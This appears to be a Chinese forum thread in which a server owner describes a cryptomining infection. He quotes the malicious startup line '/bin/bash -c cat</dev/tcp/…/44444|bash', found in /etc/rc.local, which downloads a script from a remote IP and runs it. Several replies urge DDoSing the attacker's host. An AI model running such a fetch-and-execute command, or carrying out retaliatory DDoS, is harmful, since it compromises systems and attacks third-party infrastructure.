机器中挖矿木马，大佬帮我打死他谢谢了

txjcv · 发表于 2018-3-12 11:54:39

今天服务器报警CPU飚高一直降不下来，然后连ipmi
进去服务器发现一个/usr/bin/gpg-agentd 占用1100%cpu使用率
感觉到被入侵
然后发下 /etc/rc.local文件里面多了这段
/bin/bash -c cat</dev/tcp/159.89.190.243/44444|bash

大佬们帮我D死他

专收爆米花 · 发表于 2018-3-12 11:55:38

用kill 杀shi进程！然后再删除文件

左手写爱 · 发表于 2018-3-12 11:57:02

大佬们现在都在打香港的小鸡中

txjcv · 发表于 2018-3-12 11:58:20

专收爆米花发表于 2018-3-12 11:55
用kill 杀shi进程！然后再删除文件

cat</dev/tcp/159.89.190.243/44444 这样执行，看到这个脚本。然后根据他的内容逐一来排查删除的。

txjcv · 发表于 2018-3-12 12:02:53

该ip是digitalocean 我到 https://www.digitalocean.com/company/contact/#abuse 举报了

Vicer · 发表于 2018-3-12 12:04:18

提示: 作者被禁止或删除内容自动屏蔽

snx · 发表于 2018-3-12 12:24:24

哈哈我早上也被入侵了。

hdown · 发表于 2018-3-12 13:47:55

DigitalOcean的，有20G DDOS防御，D不死。不好意思

microbean · 发表于 2018-3-12 13:52:32

Vicer 发表于 2018-3-12 12:04

这是一段什么代码？小白跪了

qq2489226 · 发表于 2018-3-12 14:12:30

吓得我赶紧看了一下冷门灵车

		自动登录	找回密码
密码			注册

Vicer Vicer 当前离线积分 28717	发表于 2018-3-12 12:04:18 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
Vicer Vicer 当前离线积分 28717
	回复支持反对举报